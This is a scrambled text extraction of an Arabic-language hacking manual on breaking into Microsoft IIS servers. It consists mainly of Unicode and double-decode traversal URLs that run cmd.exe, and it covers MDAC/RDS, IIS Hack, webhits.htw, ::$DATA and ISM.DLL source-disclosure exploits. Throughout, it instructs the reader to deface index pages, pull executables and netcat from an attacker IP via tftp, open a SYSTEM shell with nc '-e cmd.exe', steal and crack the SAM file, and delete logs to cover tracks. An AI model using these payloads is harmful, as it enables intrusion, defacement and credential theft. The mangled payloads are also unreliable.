.%_/ \:%35%63.%255c.%25%35%63...%255cwinnt/system32/cmd./ %25%35%63.%C0%AF..%252f.exe?/c+dir+c \:PBServer/.%255c.%%35%63...exe?/c+dir+c/ \:scripts/...%255c.%255cwinnt/system32/cmd.exe?/c+dir+c vti_cnf/.%C1%9C.....exe?/c+dir+c samples/./ \:%C1%9Cwinnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%/ \:%35%63winnt/system32/cmd..%%35c..%C0%AF...vti_bin/..%252f.%252f.%%35c._/ \:%255cwinnt/system32/cmd.%252f..%%35%63.%25%35%63.%255c....%C1%9C......%c1%1c.../ \:%252fwinnt/system32/cmd./winnt/system32/cmd.%%35%63..%%35c.exe?/c+dir+c/ \:scripts/..exe?/c+dir+c \:scripts/.%255c.%25%35%63...%%35%63./winnt/system32/cmd.%c1%8s..%255c..%255c.%255c..%%35cwinnt/system32/cmd./winnt/system32/cmd..._/ \:%255c.exe?/c+dir+c PBServer/./winnt/system32/cmd.%/ \:%35%63winnt/system32/cmd...%255c.%_/ \:%35c.........%255c.%%35%63.exe?/c+dir+c adsamples/..%255c..%%35c.%C1%1C.%c1%9c./wi \:nnt/system32/cmd.%255c.%255c./ \:%255cwinnt/system32/cmd./winnt/system32/cmd./winnt/system32/cmd../ \:%C1%1Cwinnt/system32/cmd..%25%35%63.%25%35%63.%%35c.%%35%63.%25%35%63.%252f./ \:%255cwinnt/system32/cmd...exe?/c+dir+c vti_bin/.%255c./ %25%35%63.%%35%63..%252f..exe?/c+dir+c/ \:scripts/....%c0%qf.%%35c.%252f..exe?/c+dir+c scripts/.%25%35%63.exe?/c+dir+c/ \:scripts/...%255c...%255c.%C1%9C.%255c......%25%35%63.%C0%AF.exe?/c+dir+c/ Rpc/..%%35cwinnt/system32/cmd...exe?/c+dir+c iisadmpwd/.exe?/c+dir+c/ \:PBServer/..exe?/c+dir+c/ 131 .%255c......%255c.%255c.%255c...%255c..%%35c..%255c../ \:%255cwinnt/system32/cmd.%25%35%63.exe?/c+dir+c cgi-bin/...exe?/c+dir+c/ PBServer/.%255c.%C1%1C..exe?/c+dir+c vti_bin/..exe?/c+dir \:+c vti_bin/.%%35%63..._/ %25%35%63.%255c.%c0%9v..exe?/c+dir+c Rpc/./winnt/system32/cmd.%25%35%63winnt/system32/cmd..%255c../winnt/system32/cmd..%255c.%25%35%63.%%35c...exe?/c+dir+c scripts/.%255cwinnt/system32/cmd..%252fwinnt/system32/cmd...exe?/c+dir+c vti_bin/.exe?/c+dir+c scripts/.exe?/c+dir+c/ \:scripts/._/ %25%35%63./wi \:nnt/system32/cmd.%252f../winnt/system32/cmd.%255c....exe?/c+dir+c/ \:Rpc/.../ \:%C0%AFwinnt/system32/cmd...%c0%af.%C1%1C..exe?/c+dir \:+c \:Rpc/..%25%35%63winnt/system32/cmd..exe?/c+dir+c/ \:scripts/...%255c....

%f0%80%80%af.%c0%af../winnt/system32/cmd..%c0%af.%c0%af./winnt/system32/cmd..%fc%80%80%80%80%af.exe\?/c+dir+c cgi-bin/./ \:%c0%af.exe?/c+dir+c vti_bin/.exe?/c+dir+c/ \:scripts/..exe?/c+dir+c/ \:scripts/.%c0%af.....exe?/c+dir+c/ \:scripts/..]/ \:%c0%af..%c0%9v.././......%c0%af..../.%c1%pc...\%e0\%80\%af.%c0%af.exe?/c+dir+c/ msadc/..%c0%af./.\/ \:%e0\%80\%af..exe?/c+dir+c/ \:scripts/....%c1%af./winnt/system32/cmd...%c0%af.exe?/c+dir+c/ \:scripts/....%c0%af.exe?/c+dir+c \:scripts/..._/ \:%c0%af./ \:%c0%af...%c0%af./winnt/system32/cmd.%c0%af.%c0%af.%c1%8s./winnt/system32/cmd..exe?/c+dir+c vti_cnf/./winnt/system32/cmd.%c0%af.%c0%af.%c0%af..%c0%af./winnt/system32/cmd./winnt/system32/cmd.%f8%80%80%80%af.%c1%9c./winnt/system32/cmd..exe?/c+dir+c ‫ من الموقع‬TFTPD ‫( بأمكانك الحصول على برنامج‬2 /http://iisbughelp..exe?/c+dir+c/ \:scripts/../winnt/system32/cmd./winnt/system32/cmd...../winnt/system32/cmd../..exe?/c+dir+c/ \:scripts/.]/ \:%c0%af.exe?/c+dir+c iisadmpwd/.exe?/c+dir+c adsamples/./winnt/system32/cmd../winnt/system32/cmd../.../winnt/system32/cmd.%e0%80%af.%c0%af./winnt/system32/cmd../..%c0%af.exe?/c+dir+c/ \:scripts/.%c1%pc../ \:%c0%af...exe?/c+dir+c/ \:scripts/./winnt/system32/cmd./ \:%c0%af..%c1%9c.%c0%af...%c0%af./../winnt/system32/cmd..\%e0\%80\%af.%c0%af.exe?/c+dir+c/ msadc/..%c1%1c.com ‫( معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع النتقال عبر الهارديسكات وعبر الملفات‬3 ( ‫)تعمل عبر المتصفح‬ scripts]/.%c0%af../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/../..........\:scripts/....%c0%af.%c0%af.%c0%qf.4t../winnt/system32/cmd.]/ \:%c0%af./....%c0%af.././ \:%c0%af.%c0%af.%c0%af....../winnt/system32/cmd.%c0%af._/ \:%c0%af.exe?/c+dir+E E:\ ‫لقرائه ما بداخل هارديسك‬ 132 ./winnt/system32/cmd../..exe?/c+dir+c samples/.._/ \:%c0%af..exe?/c+dir+D D:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/.%c0%af..exe?/c+dir+c/ \:scripts/..%c0%af...exe?/c+dir+c/ \:scripts.exe?/c+dir+C C:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/...exe?/c+dir+c vti_bin/.%c0%af./winnt/system32/cmd...%c0%af.%c0%af./winnt/system32/cmd../winnt/system32/cmd..%c0%af./winnt/system32/cmd.%c0%af..

/.%c0%af.asp‬‬ ‫‪main.../winnt/system32/cmd...htm‬الى اي اسم اخر يخطر ببالك وليكن ‪ss.%c0%af.exe?/c+dir+C:\Inetpub\wwwroot‬‬ ‫اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ) ستجدها في مجلدات بداخل مجلد الـ‬ ‫‪ ( wwwroot‬اما لو كان السيرفر عباره‬ ‫عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ ‪ wwwroot‬نفسه‬ ‫في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه‬ ‫الولى تحمل اسم ‪index.htm‬‬ ‫طبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله ‪ c+dir‬الى الداله ‪c+ren‬‬ ‫)) عليك ان تعرف ان الوامر التي سوتضع هي نفس الوامر الموجوده في ‪ Dos‬وفي ‪Command‬‬ ‫‪ Prompt‬فعليك ان تكون عارفا بما هو المر المراد استخدامه‬ ‫المهم ستكتب الثغره هكذا ‪:‬‬ ‫‪133‬‬ .asp‬‬ ‫لنفرض الن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا ‪ wwwroot‬هي ‪ index.%c0%af.%c0%af.htm‬‬ ‫‪default./winnt/system32/cmd./‬‬ ‫‪\:%c0%af.%c0%af../.‫نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب )) اغلب‬ ‫ثغرات اليونيكود تنطلق من هذه المجلدات ((‬ ‫‪(1‬مثال المجلد ‪msadc‬‬ ‫‪msadc/./.htm‬‬ ‫‪main.././‬‬ ‫‪\:%c0%af.....exe?/c+dir+c‬‬ ‫وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا ‪:‬‬ ‫‪msadc/....htm‬‬ ‫هناك عدة تسميات وأختصارات لها وهذه بعضها )) معظمها ((‬ ‫‪index.htm‬فكيف‬ ‫سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية‬ ‫الختراق هذه‬ ‫سنقوم اول بتغيير اسم الملف من ‪ index..../winnt/system32/cmd..%c0%af.%c0%af../././winnt/system32/cmd.%c0%af...exe?/c+dir+C‬‬ ‫‪ (2‬مثال المجلد _‪vti_bin‬‬ ‫‪vti_bin/./././‬‬ ‫‪%c0%af.exe?/c+dir+C‬‬ ‫في سيرفرات ‪ IIS‬عند تركيبها )) بشكل عادي (( يكون المجلد الرئيسي للويب تحت اسم معين وهو ‪:‬‬ ‫‪C:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪D:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪E:\Inetpub\wwwroot‬‬ ‫في العاده يكون في الهارديسك ‪ C‬ولذلك سأكمل شرحي على انه هناك‬ ‫ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر‬ ‫فلو وجدنا ثغرة يونيكود ما ولتكن‬ ‫‪msadc/...htm‬‬ ‫‪index._/‬‬ ‫‪\:%c0%af.asp‬‬ ‫‪default...

XXX.htm‬‬ ‫وهكذا فقد تم تغيير اسم الصفحة من ‪ index..%c0%af..XXX.XXX+GET+index.XXX get index.%c1%9c./.htm‬‬ ‫وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختراق )) تقريبا ‪(( (:‬‬ ‫ملحوظه ‪ :‬يمكنك ان تقوم بتحميل ملفات ‪ EXE‬ايضا وتشغيلها على السيرفر بنفس السلوب وهذا مثال ‪:‬‬ ‫‪134‬‬ .%c1%9c.htm‬‬ ‫وقم بالتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو ‪:‬‬ ‫‪msadc/.htm‬‬ ‫‪C:\inetpub\wwwroot\index.XXX.XXX.htm+C:\Inetpub\wwwroot\index./..htm+C:\Inetpub\wwwroot\index.htm‬‬ ‫ياللروعه لقد تجاوزنا العقبه بالفعل ‪(:‬‬ ‫الن قم بتشغيل سيرفر الـ ‪ TFTP‬وقم بتجهيز ملف الـ ‪index.exe?/c+tftp.XXX+GET+index.htm‬الى ‪ss./..exe+‬‬‫‪i"+XXX.htm‬‬ ‫)) ‪ XXX..htm‬وضعها في \‪C:‬‬ ‫الن نريد ان نرسل للسيرفر الملف الجديد من \‪ C:‬لدينا الى ملف‬ ‫‪C:\inetpub\wwwroot‬‬ ‫ل ليس المر صعبا ففي نظم ميكروسوفت يوجد امر )) هو بالصح برنامجا منفصل (( يحمل اسم ‪TFTP‬‬ ‫وهو عباره عن كلينت بسيط يستخدم‬ ‫بروتوكول ‪ TFTP‬وهو بروتوكول بسيط جدا جدا )) يسميه البعض البروتوكول التافه (( يقوم بسحب او‬ ‫ارسال الملفات من والى الجهاز‬ ‫نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟‬ ‫طبعا لو كنا في غير اليونيكود لكتبنا توليفة المر التالي ‪:‬‬ ‫‪tftp.XXX.XXX....‫‪msadc/./‬‬ ‫"‪%c1%9c./‬‬ ‫‪%c0%af.htm‬ليضعه في جهازه في المجلد‬ ‫‪wwwroot‬‬ ‫ولكن ل تنسى فشكل توليفة الوامر يختلف من الوضع العادي عن وضع اليونيكود‬ ‫فما هو الحل ؟‬ ‫الحل هو ان تحول توليفة المر الى يونيكود لتضعه في الثغره التي لديك‬ ‫بعد تحويل المر الى يونيكود سيصبح شكله كالتالي ‪:‬‬ ‫"‪tftp.exe+‬‬‫‪i"+XXX./..htm‬‬ ‫ارأيتم كم هو سهل ‪ (:‬؟‬ ‫‪A‬يبدو انك ايها المخترق لم تكتفي باغلق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر‬ ‫وليكن الموضوع هو‬ ‫‪!!!Hacked‬‬ ‫فكيف سنرسلها في صفحة ‪ index../winnt/system32/cmd.XXX‬تعني اي بي السيرفر المراد سحب الملف منه ((‬ ‫في توليفة هذا المر يقوم الكلينت بطلب الملف المسمى ‪ index.ht‬‬ ‫‪m+ss./winnt/system32/cmd.exe -i XXX.XXX.XXX.exe?/c+ren+C:\Inetpub\wwwroot\index.%c0%af..htm‬؟؟‬ ‫هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر التصال بمنفذ ‪ TFTP‬الذي ستكون فيه انت في وضع‬ ‫السيرفر والموقع الذي امامك‬ ‫في وضع الكلينت‬ ‫كيف سيتم هذا ؟‬ ‫اول قم بتركيب نظام سيرفر ‪ TFTP‬على جهازك ) البرنامج المذكور في اول الموضوع من افضل البرامج‬ ‫وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي (‬ ‫الن ضع السيرفر الرئيسي في \‪ C:‬لديك‬ ‫قم بتصميم صفحة خفيفه وسريعه وسمها ‪ index..

..././..exe‬‬ ‫الن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج ‪*././...%c0%af.%c1%9c.exe/‬‬ ‫او عن طريق هذا المر‬ ‫‪msadc/.XXX..%c1%9c.....exe‬‬ ‫بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا المر‬ ‫‪msadc/.%c0%af.%c1%9c..tmp/s‬‬ ‫ايضا ملحوظه مهمه وهي ان ل تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او‬ ‫ايميلتهم الحقيقيه قم بمسح اي شيء يدل عليك‬ ‫او على عملية الختراق )) حاول ان تصل الى هذا المستوى ((‬ ‫هناك عدد من الشياء والفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف ‪ bat‬حتى تتمكن من‬ ‫وضع مشكله كبيره في السيرفر لكي ل يعمل‬ ‫او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج‬ ‫التحكم عن بعد و اخفائها بشكل جيد‬ ‫في المجلدات ذات الملفات الكثير )) مثل ‪ (( system32‬والكثير الكثير‬ ‫______________________________________________________________‬ ‫__________________‬ ‫ملحوظات ‪ :‬لن تعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن‬ ‫طريق مسح ملف ‪ tftp‬من سيرفراتهم‬ ‫)) الملف المسؤول عن ذلك موجود في المجلد ‪ (( system32‬وبعض السيرفرات قامت بعملية الترقيع‬ ‫)) اصدرت ميكروسوفت ترقيعا لهذه الثغره ((‬ ‫وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه‬ ‫العمليات‬ ‫واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم ‪ IIS‬ال وهو ‪ Secure IIS‬من شركة ‪Eeye‬‬ ‫والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع )) قبل حوالي اربعة اشهر (( كان ما يقارب ‪%90‬‬ ‫من السيرفرات التي فيها نظام ‪IIS‬‬ ‫تحوي هذه الثغره وبدون ترقيع )) لعدم وجوده وقتها (( او لهمال المدير‪..exe+C:\hunter.exe?/c+del+C:\*./winnt/system32/cmd./‬‬ ‫‪%c0%af../winnt/system32/cmd././.‬‬ ‫انتهى‪،،،‬‬ ‫‪135‬‬ .....exe‬ونريد تشغيله فكيف لنا ذلك ؟‬ ‫سنتبع التي ‪:‬‬ ‫نقوم بتحميل الملف على السيرفر كما قمنا بتحميل ‪ index.%c0%af.XXX.%c1%9c./.XXX+GET+hunter..%c1%9c.exe?/c+del+C:\*././hunter.‫لنفرض اننا نريد تحميل ملف ‪ EXE‬على السيرفر وسميناه ‪ hunter./‬‬ ‫‪%c1%9c../winnt/system32/cmd.exe?/c+tftp.../.log/s‬‬ ‫هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات‬ ‫المتداد ‪tmp‬‬ ‫وهذا امر مسحها عبر اليونيكود ‪:‬‬ ‫‪msadc/.%c1%9c...exe+‬‬‫‪i"+XXX.log‬‬ ‫وسيكون ذلك عن طريق هذا المر ‪:‬‬ ‫‪msadc/..../winnt/system32/cmd./‬‬ ‫‪%c0%af.%c0%af.%c1%9c.exe?/c+hunter./....htm‬ونضعه في \‪ C:‬للسيرفر عبر هذه التوليفه‬ ‫‪:‬‬ ‫‪msadc/./‬‬ ‫"‪%c1%9c.

‬لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع‬ ‫توضيح كيفية عملها ‪..net/rfp‬‬ ‫‪ -2‬اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله من الموقع ‪:‬‬ ‫‪( /http://www.activestate.wiretrip. IIS‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪###########‬‬ ‫‪# Game Starts !#‬‬ ‫‪###########‬‬ ‫‪---------------‬‬‫‪136‬‬ ..‫" الدليل الكامل لختراق سيرفر ‪" IIS‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫>ةةةةةة‪< DEMON :‬‬ ‫‪--------‬‬‫مقدمة ‪.‬أنا افضل ‪) Whisker‬يمكنك تنزيله من هذا الموقع ‪:‬‬ ‫‪( www..:‬‬ ‫‪------------‬‬‫‪ CGI-Scanner -1‬جيد ‪ .:‬‬ ‫‪--------‬‬‫معظم الطرق الموجودة هنا تعمل على سيرفرات ‪ IIS4.0‬وجميعها تعتمد على البورت ‪)) 80‬يعني‬ ‫من خلل المتصفح(( ‪.‬‬ ‫‪--------‬‬‫ملحظة ‪.:‬‬ ‫‪--------‬‬‫يعلم الجميع مدى انتشار سيرفرات ‪ IIS‬حيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت ‪.‬‬ ‫ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات ‪ .com‬‬ ‫‪ -3‬ويب سيرفر )اي نوع( اباتشي او ‪.0‬و ‪ IIS5.‬‬ ‫‪------------‬‬‫المتطلبات ‪..

pl .‬‬ ‫قم اول بالتصال بالنظام الهدف ‪ c:\>nc -nw -w 2 http://www.asp & Showcode.exe‬من الموقع ‪.0‬فقط ))اذا لم يتم تركيب الرقعه(( ‪.‬سيتم تشغيل وامرك بصفتك مستخدم‬ ‫‪ SYSTEM‬اي بصلحيات مدير النظام ‪ .‬‬ ‫قم بنسخ اداة ‪ nc. hey common you must be‬‬ ‫‪kidding‬‬ ‫‪.‬على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة‬ ‫ام ل ‪.asp‬‬ ‫‪-------------------------------------‬‬‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي مع ‪ IIS‬ولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظام‬ ‫‪137‬‬ .hehe.exe‬وجعلها تنصت‬ ‫على المنفذ ‪..com‬‬ ‫ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ‪.com‬‬ ‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬ ‫‪cmd /c‬‬ ‫إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر ‪echo hacked by me hehe > :‬‬ ‫‪C:\inetpub\wwwroot\index.exe&&del ftptmp&& attrib -r%‬‬ ‫‪nc.‫‪.exe‬‬ ‫‪---------------‬‬‫اكتشف خبراء المن في شركة ‪ eEye‬ثغرة امنية تسمح لك بتحميل نسخه ذكية من ‪ nc...: IIS Hack.exe‬‬ ‫)) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته جيدا ((‬ ‫بعدها قم بالتصال بالنظام الهدف على المنفذ ‪ 80‬وستجد سطر اوامر مع امتيازات ‪. 80‬‬ ‫وهذا سيعطيك سطر اوامر ‪ cmde.com‬وستجد امامك ‪eGG SheLL‬‬ ‫ملحظة ‪ :‬تعمل هذه الثغرة على سيرفرات ‪ IIS4. /http://www.‬‬ ‫‪do you want me to explain what to do next.exe -l -p 80 -t -e cmd.net/rfp :‬‬ ‫‪(( mdac..exe‬‬ ‫‪c:\>iishack.msadc2.pl -h host.target.exe‬و ‪ IIS Hack.htm‬‬ ‫وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل ‪ Hacker's Swiss knife Army‬اقصد‬ ‫‪ Nc. Administrator‬‬ ‫‪-------------------------------------‬‬‫‪-: Codebrws. Administrator‬‬ ‫بامكانك انزال ‪ NC..exe‬بواسطة هذا المر ‪:‬‬ ‫‪systemroot%&&tftp -i YourIP GET nc. wwwroot‬‬ ‫ثم قم بتشغيل ‪: IISHack.exe‬‬ ‫وبعد اتمام الخطوة السابقة بنجاح ‪:‬‬ ‫‪ /c:\>nc http://www.target.technotronic.exe&&nc.exe‬مع امتيازات ‪.exe‬وضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتشي ‪ (Htdocs‬وفي ‪IIS‬‬ ‫الدليل ‪.host..com/ 80 your_IP/ncx..‬‬ ‫بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع ‪www...pl )) v‬‬ ‫‪c:\> mdac.dll HTTP :‬‬ ‫فإذا كان الرد ‪ application/x_varg :‬فهذا يعني ان النظام مصاب )) اذا لم يتم ترقيعه (( ‪..‬‬ ‫تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي ‪ .wiretrip.‬‬ ‫‪----------------‬‬‫‪-: MDAC = RDS‬‬ ‫‪----------------‬‬‫اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان ‪ %40‬من المواقع تعاني منها ‪...com/ 80 :‬ثم قم بارسال‬ ‫المر ‪GET /msadc/msadcs.exe http://www.

victim.: webhits.htw‬‬ ‫‪-----------‬‬‫عملية شرح كيفية عمل هذه الثغرة معقد قليل ‪ .HiliteType=full :‬‬ ‫سيعرض لك هذا الرابط السورس كود الخاص بالصفحه ‪..‬‬ ‫‪138‬‬ .‬‬ ‫فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف ‪)) asp. ASP‬‬ ‫لتنفيذ الثغرة ‪http://www.asa‬‬ ‫يمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر ‪http://www.‬اعني رؤية‬ ‫المصدر(( ‪..com/default.victim.htw‬‬ ‫‪---------------------‬‬‫اول قم بتجربة اللنك على النظام الهدف ‪http://www.htw :‬‬ ‫فإذا كان الرد بهذه العبارة ‪ format of the QUERY_STRING is invalid :‬فهذا يعني ان النظام‬ ‫الهدف مصاب بنسبة ‪. Default. 1998‬وهي مخصصة بالتحديد لسيرفرات ‪ IIS3..htw?CiWe.asp‬‬ ‫‪---------------------‬‬‫‪..htw‬باحد هذه الملحقات ‪ .com/xxxxxxxxx/xxxxxxxx/x....: ASP dot bug‬‬ ‫‪-----------------‬‬‫ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ‪.‬لذا سأكتفي فقط بطريقة الستفادة منها ‪.com/blabla.‬‬ ‫باستخدام هذا المر ستحصل على ملف السام )) اذا كان النظام مصابا (( ‪:‬‬ ‫‪_.‬‬ ‫‪-------------‬‬‫‪.victim.0‬سيتم‬ ‫كسرها في اقل من ‪ 24‬ساعه ( ‪..‫تفعيله ‪. IIS4.. LC3‬‬ ‫‪-----------------------------------------------‬‬‫]‪-: ASP Alternate Data Streams [::$DATA‬‬ ‫‪-----------------------------------------------‬‬‫هذه الثغرة كانت بدايتها منذ العام ‪ .hilitetype=full‬‬ ‫مع تغيير الـ ‪ XXXXX/XXXXX/XXXX/XXX.. Expand it & Crack it‬باستخدام الداة المفضلة لدي ‪) LC3.0‬والن تعمل على‬ ‫بعض سيرفرات ‪.victim.com/null.asp::‬‬ ‫‪$DATA‬‬ ‫‪-----------------‬‬‫‪.htw‬‬ ‫‪isssamples/exair/search/qfullhit.victim.dll & .nt/repair/sam‬‬ ‫بعد الحصول على ملف السام ‪ .htw‬‬ ‫‪isssamples/exair/search/qsumrhit.com/msadc/samples.. %90‬‬ ‫اخيرا جرب تنفيذ الثغرة بهذه الطريقة ‪:‬‬ ‫‪www..‬‬ ‫باختصار تسمح لك برؤية السورس كود لي ملف ‪...htw‬‬ ‫‪iissamples/issamples/oop/qsumrhit.htw‬‬ ‫وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة ‪..‬وبالتأكيد سيعمل احدها ‪:‬‬ ‫‪iissamples/issamples/oop/qfullhit.0‬‬ ‫ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((‬ ‫الجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل ‪Global.http://www.: Null.

%20‬‬ ‫هذا الخطأ يعمل على سيرفرات ‪ . PASS Database‬‬ ‫الثغرة ‪http://www.: ISM.‬وفي الحقيقة نحن نقوم بطلب ملف‬ ‫اخر ‪..‬وسيحصل على معلومات قيمة و هامة أيضا ‪. 1997‬‬ ‫ويتم تنفيذها من المتصفح بهذا الشكل ‪:‬‬ ‫‪ http://www.asp.‬اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل‬ ‫‪ Rebot‬او ‪.com/adsamples/config/site.dll‬عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل ‪ .0‬‬ ‫‪-----------------------------------‬‬‫‪..victim.csc‬‬ ‫‪-----------‬‬‫تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ ‪ DNS‬الخاص بالموقع بما في ذلك ‪DSN.com/global..0&5.com/sample.dll‬حيث يتم تحميله بعدد كبير من الرموز المسافة )‪( 20%‬‬ ‫‪.asa..victim.. Logout & Login‬‬ ‫‪---------‬‬‫‪-: htr. ASP‬‬ ‫يمكن استخدامها بهذا الشكل ‪:‬‬ ‫‪http://www.0‬ولكن ل يمكن تجربتها على السيرفر اكثر من مره ال اذا‬ ‫قام بتسجيل خروج وتسجيل دخول ‪ .‬ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف‬ ‫‪ ISM.‬لذا يجب اعادة‬ ‫تحميل الملف في الذاكرة مره اخرى ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫‪139‬‬ ....asa%20(. Space‬‬ ‫يمكن تنفيذ الثغرة بهذا الشكل ‪:‬‬ ‫‪http://www. IIS 4..com/global..‬‬ ‫وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما ‪ . UID and‬‬ ‫‪.htr‬‬ ‫مكان الـ ‪ <=230‬نقوم بوضع ‪ 230‬مسافة بهذا الشكل ‪.victim.csc :‬‬ ‫سيقوم المهاجم بانزال الملف المذكور ‪ .: site...DLL Buffer Truncation‬‬ ‫‪-----------------------------------‬‬‫خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ‪.victim.‫حيث تم اكتشافها في العام ‪.+‬‬ ‫‪--------‬‬‫هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ‪. IIS3.‬لحظ النقطة الموجودة في اخر السطر‬ ‫وهي فقط تعمل على سيرفرات ‪.htr‬‬ ‫‪------------‬‬‫‪.asa+.‬‬ ‫الملف المسؤوول عن هذا الخطأ هو ‪ ISM.<=230)global.

%5c.‬الخ ( و لكن انا اقوله‬ ‫اصبر لقد ذكرت اليونى كود فى المنتديات ثلث مرات مره عن الصديق بلك هنتر و مره من الخ هكس و‬ ‫مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام الختلف عن المرات‬ ‫السابقه )‪( Trust Me‬‬ ‫و الن دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم‪::‬‬ ‫اول‪:‬‬ ‫====‬ ‫متى وجدت اليونى كود؟‬ ‫‪Found On 15 May 2001 BY NSFOCUS‬‬ ‫السيستيمز التى تتأثر بالثغره هى ‪::‬‬ ‫‪All running IIS 4 / IIS 5 web server‬‬ ‫‪Windows 2k‬‬ ‫‪Windows 2k SP1 + SP2‬‬ ‫ثغره اليونى كود ‪::‬هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلحيه مسموح بها )اى يكون‬ ‫له امتياز ‪( IUSR_machinename account‬‬ ‫و تحدث هذه الثغره اصل نتيجه ان روتين ال ‪ cgi‬الموجود على الويب سرفر نفسه يفك شفره عنوان الموقع‬ ‫مرتين و هذا ما نسميه بال ‪) DeCode‬ل تقلق ستفهم بعد ذلك (‬ ‫تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى‬ ‫و ليكن مثل ‪::‬‬ ‫‪ <=== http://iisserver/scripts/...../scripts/‬و هذا الفولدر لديه امتيازات تنفيذيه على السرفر )اى يمكن لليوزر تنفيذ اى امر على الوب‬ ‫سرفر من خلله ( وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال ‪ cgi‬الموجوده على الوب سرفر و‬ ‫‪140‬‬ ..exe?/c+dir+c‬ثغره يونى كود‬ ‫‪ <==== /http://iisserver‬سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه‬ ‫* ‪ .‬‬ ‫اعذرونى على غيبتى و انقطاعى عنكم و لكن و ال ظروف رهيبه‬ ‫و الن خلونا نرغى فى شويه كلم فاضى على رأى بروكن‬ ‫كنت اتصفح النترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث‬ ‫عن اليونى كود )طبعا الن معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ‪...‫"دراسة مفصلة وبعمق في الـ ‪"UniCode‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dark Devil :‬‬ ‫السلم عليكم ورحمه ال و بركاته ‪::‬‬ ‫ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو‪.md.%.

